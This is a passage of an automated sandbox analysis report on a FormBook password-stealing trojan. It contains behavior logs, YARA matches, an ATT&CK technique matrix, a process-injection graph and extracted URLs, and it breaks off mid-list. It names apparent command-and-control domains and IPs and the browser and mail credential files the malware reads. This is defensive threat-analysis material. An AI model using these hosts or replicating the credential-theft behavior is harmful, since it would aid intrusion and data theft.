          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match; File source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\rundll32.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
          Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

          Source: Yara match; File source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; File source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
          Execution: Shared Modules (1); Scheduled Task/Job (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
          Persistence: Scheduled Task/Job (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Privilege Escalation: Process Injection (612); Scheduled Task/Job (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux)
          Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (2); Rootkit (1); Masquerading (1); Virtualization/Sandbox Evasion (31); Process Injection (612); Rundll32 (1)
          Credential Access: OS Credential Dumping (1); Credential API Hooking (1); Input Capture (1); NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
          Discovery: File and Directory Discovery (2); System Information Discovery (113); Security Software Discovery (221); Process Discovery (2); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); Remote System Discovery (1); Network Service Scanning; System Network Connections Discovery
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools
          Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Credential API Hooking (1); Input Capture (1); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
          Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (114); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction
          Behavior Graph (ID: 1276619, Sample: SecuriteInfo.com.Win32.PWSX..., Startdate: 20/07/2023, Architecture: WINDOWS, Score: 100)
          Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

          hkkRsa.exe (started)
            Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
            hkkRsa.exe (started)
              Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
              explorer.exe (injected)
                Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                DNS/IP: www.naspewt.xyz 184.94.215.140, 49729, 49730, 80 VXCHNGE-NC01US United States
                DNS/IP: vestostore.com 86.38.202.187, 49711, 49712, 49713 LRTC-ASLT Lithuania
                DNS/IP: 14 other IPs or domains
                rundll32.exe (started)
                  Signatures: Detected FormBook malware; Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); 3 other signatures
                  Dropped: C:\Users\user\AppData\...\479logrv.ini, data
                  Dropped: C:\Users\user\AppData\...\479logri.ini, data
                  cmd.exe (started)
                    Signatures: Tries to harvest and steal browser information (history, passwords, etc)
                    Dropped: C:\Users\user\AppData\Local\Temp\DB1, SQLite
                    conhost.exe (started)
            schtasks.exe (started)
              conhost.exe (started)

          SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe (started)
            Signatures: Uses schtasks.exe or at.exe to add and modify task schedules; Adds a directory exclusion to Windows Defender
            Dropped: C:\Users\user\AppData\Roaming\hkkRsa.exe, PE32
            Dropped: C:\Users\user\...\hkkRsa.exe:Zone.Identifier, ASCII
            Dropped: C:\Users\user\AppData\Local\...\tmpE41B.tmp, XML
            Dropped: SecuriteInfo.com.W...11935.10916.exe.log, ASCII
            powershell.exe (started)
              conhost.exe (started)
            powershell.exe (started)
              conhost.exe (started)
            schtasks.exe (started)
              conhost.exe (started)
            SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe (started)

          Source | Detection | Scanner | Label | Link
          SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
          SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe | 100% | Joe Sandbox ML | |

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Roaming\hkkRsa.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Roaming\hkkRsa.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
          No Antivirus matches
          No Antivirus matches
                                          high
                                          http://www.mazinhoccb.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000F.00000000.451928214.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.f1-austin-tickets.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.galapagosdesign.com/SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398342627.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398248570.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.comcomaSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395278067.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395023468.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395121921.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.pym479.com/co63/www.creativebrea.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.cucinainvenice.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 0000000F.00000000.478178422.00007FFA13109000.00000002.00000001.01000000.0000000B.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.dlafluid.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.vestostore.com/co63/www.saleschildcarriers.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/ASecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.mazinhoccb.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://en.wSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.387986518.0000000005745000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/=SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.saleschildcarriers.com/co63/www.ballthingsez.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.carterandcone.comlSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.founder.com.cn/cn-SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390314780.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390372892.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390236589.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390359851.0000000005776000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/jp/$SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392167050.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392276202.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392786588.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, 